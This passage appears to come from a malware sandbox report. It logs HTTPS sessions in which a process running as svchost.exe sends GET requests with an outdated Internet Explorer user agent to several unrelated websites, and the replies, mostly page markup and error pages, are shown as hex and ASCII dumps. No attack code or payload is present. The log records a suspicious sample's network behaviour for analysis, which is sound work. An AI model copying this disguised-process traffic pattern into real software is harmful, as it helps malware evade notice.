                                                                                                                                                                              2023-09-15 05:27:49 UTC5523INData Raw: 30 2c 30 2c 31 2d 33 2e 31 33 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 38 2e 30 35 2c 32 36 2e 33 36 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61
                                                                                                                                                                              Data Ascii: 0,0,1-3.13-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M478.05,26.36a1.6,1.6,0,0,1-.72,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path cla
                                                                                                                                                                              2023-09-15 05:27:49 UTC5539INData Raw: 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 30 36 2e 33 37 2c 38 33 2e 38 31 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30
                                                                                                                                                                              Data Ascii: 1.6,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M506.37,83.81a1.6,1.6,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0
                                                                                                                                                                              2023-09-15 05:27:49 UTC5555INData Raw: 34 2e 39 31 2c 31 34 37 2e 37 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 34 2e 36 39 2c 31 34 31 2e 32 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e
                                                                                                                                                                              Data Ascii: 4.91,147.74a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M534.69,141.26a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.
                                                                                                                                                                              2023-09-15 05:27:49 UTC5571INData Raw: 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 35 30 2e 35 2c 32 33 2e 39 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 35 30 2e 32 38 2c 31 37 2e 34 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38
                                                                                                                                                                              Data Ascii: ="cls-9" d="M550.5,23.91a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M550.28,17.43a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48
                                                                                                                                                                              2023-09-15 05:27:49 UTC5587INData Raw: 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 20 69 64 3d 22 74 6f 70 2d 73 6c 69 64 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 73 6d 2d 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 63 61 73 65 2f 77 6f 72 6b 73 2f 6d 61 69 6e 74 65 6e 61 6e 63 65 2e 68 74 6d 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 2d 70 65 72 66 6f 72 6d 61 6e 63 65 2d 69 6e 6e 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2e 2f 69 6d 61 67 65 73 2f 74 6f 70 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2d 69 6d
                                                                                                                                                                              Data Ascii: iv class="container"> <div class="row" id="top-slide"> <div class="col-sm-4"> <a href="case/works/maintenance.html"> <div class="top-performance-inner"><img src="./images/top/performance-im


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                              21192.168.2.364318185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                              2023-09-15 05:27:42 UTC2905OUTGET / HTTP/1.1
                                                                                                                                                                              Accept: *
                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Host: techtrans.de
                                                                                                                                                                              2023-09-15 05:27:42 UTC2907INHTTP/1.1 403 Forbidden
                                                                                                                                                                              Date: Fri, 15 Sep 2023 05:27:42 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                              Expires: 0
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                              Content-Security-Policy: report-uri https://techtrans.de
                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                              Permissions-Policy: accelerometer=(), autoplay=(), camera=(), fullscreen=*, geolocation=(self), gyroscope=(), microphone=(), payment=*
                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              Access-Control-Allow-Methods: GET,PUT,POST,DELETE
                                                                                                                                                                              Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                              X-Content-Security-Policy: img-src *; media-src * data:;
                                                                                                                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              2023-09-15 05:27:42 UTC2908INData Raw: 32 63 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                              Data Ascii: 2c6<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                              22192.168.2.3643285.189.171.125443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                              2023-09-15 05:27:42 UTC2905OUTGET / HTTP/1.1
                                                                                                                                                                              Accept: *
                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Host: www.muhr-soehne.de
                                                                                                                                                                              2023-09-15 05:27:42 UTC2908INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Fri, 15 Sep 2023 05:27:42 GMT
                                                                                                                                                                              Server: Apache/2.4.38 (Debian)
                                                                                                                                                                              Last-Modified: Wed, 06 Sep 2023 11:27:25 GMT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Content-Length: 52614
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              2023-09-15 05:27:42 UTC2926INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
                                                                                                                                                                              2023-09-15 05:27:42 UTC2942INData Raw: 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65 73 73 74 65 63 68 6e 69 6b 2f 76 65 72 73 63 68 6c 69 65 73 73 6d 61 73 63 68 69 6e 65 6e 22 20 74 69 74 6c 65 3d 22 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: item layout-0 "> <a href="/verschliesstechnik/verschliessmaschinen" title="Verschliemaschinen"> Verschliemaschinen </a>
                                                                                                                                                                              2023-09-15 05:27:42 UTC3018INData Raw: 6d 69 6e 2f 75 73 65 72 5f 75 70 6c 6f 61 64 2f 4e 61 63 68 68 61 6c 74 69 67 6b 65 69 74 2f 63 73 6d 5f 6d 65 74 61 6c 5f 72 65 63 79 63 6c 65 73 5f 66 6f 72 65 76 65 72 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 31 33 39 39 70 78 29 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 39 39 32 70 78 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 75 73 65 72 5f 75 70 6c 6f 61 64 2f 4e 61 63 68 68 61 6c 74 69 67 6b 65 69 74 2f 63 73 6d 5f 6d 65 74 61 6c 5f 72 65 63 79 63 6c 65 73 5f 66 6f 72 65 76 65 72 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 34 30 30 70 78 29 22 0a 20 20 20 20
                                                                                                                                                                              Data Ascii: min/user_upload/Nachhaltigkeit/csm_metal_recycles_forever.jpg"><source media="(max-width: 1399px) and (min-width:992px)" srcset="/fileadmin/user_upload/Nachhaltigkeit/csm_metal_recycles_forever.jpg"><source media="(min-width: 1400px)"
                                                                                                                                                                              2023-09-15 05:27:42 UTC3050INData Raw: 39 39 32 70 78 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 5f 70 72 6f 63 65 73 73 65 64 5f 2f 65 2f 63 2f 63 73 6d 5f 65 66 72 65 2d 65 75 5f 34 38 30 5f 30 32 62 64 33 65 31 34 64 39 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 34 30 30 70 78 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 5f 70 72 6f 63 65 73 73 65 64 5f 2f 65 2f 63 2f 63 73 6d 5f 65 66 72 65 2d 65 75 5f 34 38 30 5f 30 32 62 64 33 65 31 34 64 39 2e 6a 70 67 22 3e 3c 69 6d 67 20 63 6c 61 73 73 3d 22 69 6d 61 67 65 2d 65 6d 62 65 64 2d 69 74 65 6d 20 20 69 6d 67 20 69 6d 67 2d 66 6c 75 69 64 22 20
                                                                                                                                                                              Data Ascii: 992px)" srcset="/fileadmin/_processed_/e/c/csm_efre-eu_480_02bd3e14d9.jpg"><source media="(min-width: 1400px)" srcset="/fileadmin/_processed_/e/c/csm_efre-eu_480_02bd3e14d9.jpg"><img class="image-embed-item img img-fluid"


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                              23192.168.2.36442894.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                              2023-09-15 05:27:42 UTC2907OUTGET / HTTP/1.1
                                                                                                                                                                              Accept: *
                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Host: www.diamir.de
                                                                                                                                                                              2023-09-15 05:27:42 UTC2969INHTTP/1.1 403 Forbidden
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Fri, 15 Sep 2023 05:27:42 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 548
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                              2023-09-15 05:27:42 UTC2969INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                              24192.168.2.34330275.2.95.235443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                              2023-09-15 05:28:17 UTC5598OUTGET / HTTP/1.1
                                                                                                                                                                              Accept: *
                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Host: ldh.la.gov
                                                                                                                                                                              2023-09-15 05:28:17 UTC5598INHTTP/1.1 406 Not Acceptable
                                                                                                                                                                              Date: Fri, 15 Sep 2023 05:28:17 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 1346
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Server: Microsoft-IIS/10.0
                                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                                              2023-09-15 05:28:17 UTC5598INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 36 20 2d 20 43 6c 69
                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>406 - Cli


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                              25192.168.2.344526172.67.156.49443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                              2023-09-15 05:28:17 UTC5599OUTGET / HTTP/1.1
                                                                                                                                                                              Accept: *
                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Host: orlyhotel.com
                                                                                                                                                                              Cookie: django_language=en
                                                                                                                                                                              2023-09-15 05:28:18 UTC5600INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                              Date: Fri, 15 Sep 2023 05:28:18 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: max-age=0, no-store, no-cache, must-revalidate
                                                                                                                                                                              Expires: Fri, 15 Sep 2023 05:15:15 GMT
                                                                                                                                                                              Content-Language: en
                                                                                                                                                                              Last-Modified: Fri, 15 Sep 2023 05:15:15 GMT
                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                              Vary: Accept-Language
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=q0mUY4hHV5QXG819yw3AJfwk1Y0WmioLB59%2B4oEQjVKkWOpfE4ATA9gU%2Bjz%2Fv0%2B9GUcLNx7f%2FFf7ikvMRGlBXHw6Qb0h2OYncY7BTu6kCJ8zu2OoDRdNdrmqCVvdY3xP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 806e772878e91855-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              2023-09-15 05:28:18 UTC5601INData Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a
                                                                                                                                                                              Data Ascii: 1b<h1>Server Error (500)</h1>
                                                                                                                                                                              2023-09-15 05:28:18 UTC5601INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                              26192.168.2.3448045.189.171.125443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                              2023-09-15 05:28:18 UTC5600OUTGET / HTTP/1.1
                                                                                                                                                                              Accept: *
                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Host: www.muhr-soehne.de
                                                                                                                                                                              2023-09-15 05:28:18 UTC5601INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Fri, 15 Sep 2023 05:28:18 GMT
                                                                                                                                                                              Server: Apache/2.4.38 (Debian)
                                                                                                                                                                              Last-Modified: Wed, 06 Sep 2023 11:27:25 GMT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Content-Length: 52614
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              2023-09-15 05:28:18 UTC5601INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
